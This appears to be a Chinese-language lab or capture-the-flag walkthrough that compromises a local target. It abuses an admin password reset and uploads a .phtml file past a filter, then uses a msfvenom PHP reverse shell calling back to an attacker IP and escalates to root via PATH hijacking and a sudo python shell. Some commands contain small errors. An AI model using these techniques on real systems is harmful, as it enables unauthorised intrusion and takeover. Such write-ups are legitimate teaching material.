1 信息收集
1.1 主機發現
arp-scan -l
主機IP地址為:192.168.1.17
1.2 端口和服務掃描
nmap -sS -sV -A -T5 -p- 192.168.1.17
開放22,80端口
1.3 目錄掃描
dirsearch -u 192.168.1.17
2 滲透
2.1 訪問端口
2.2 注冊賬號
暴力破解不現實,可以嘗試注冊一個個賬號
分別輸出入用戶名,郵箱,密碼
2.3 登錄網站
2.4 抓包
測試修改密碼并將id修改為1
這里現在密碼已經更新 已經修改好了從新登入:admin/123 發現登入成功!!!! 看到一個上傳點 🆗又可以繼續利用了
2.5 文件上傳
這里過濾了很多試了好幾個都不行(連接不上)可以使用phar或者phtml進行繞過
新建一個文檔輸入: ` 把后綴改為png、jpg、gif然后抓包 修改為phtml`然后放包 有個藍色的file點擊即可
上傳結果
2.6 中國蟻劍鏈接
2.7 反彈shell
1 生成php反彈shell腳本:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.52 lpor=4444 -o shell.php
2 啟動pythonweb服務
python3 -m http.server 80
在靶機的upload文件夾下載:
wget http://192.168.1.17/shell.php
3 kali啟動msf監聽
開啟msf,使用模塊,設置參數和載荷:
use exploit/multi/handler set lhost 192.168.1.52 set lport 4444 set payload php/meterpreter/reverse_tcp
開啟監聽并訪問shell文件觸發監聽:
run http://192.168.1.17//upload/msfshell.php
進入shell,并生成一個交互式shell:
shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
3 提權
3.1 敏感文件
查看敏感文件之后發現有兩個用戶:
cat /etc/passwd | grep /bin/bash
3.2 提權
經過一番搜索,在john的家目錄發現一個叫toto的文件,具有SUID權限,其作用是輸出id:
既然如此,我們能不能修改一下環境變量,讓他執行id命令的時候打開一個john的bash:
echo "/bin/bash" > /tmp/id chmod 777 /tmp/id export PATH=/tmp:$PATH ./toto
拿到john的權限之后,查看john的家目錄,找到了密碼:
查看john的權限: 這里需要輸入密碼
sudo -l
發現john可以以root的身份執行file這個python文件:
在file.py里面寫一段打開shell的代碼,再以root的身份執行:
echo "import pty;pty.spawn('/bin/bash')" > file.py
sudo python3 /home/john/file.py
成功拿到root權限!!!
)
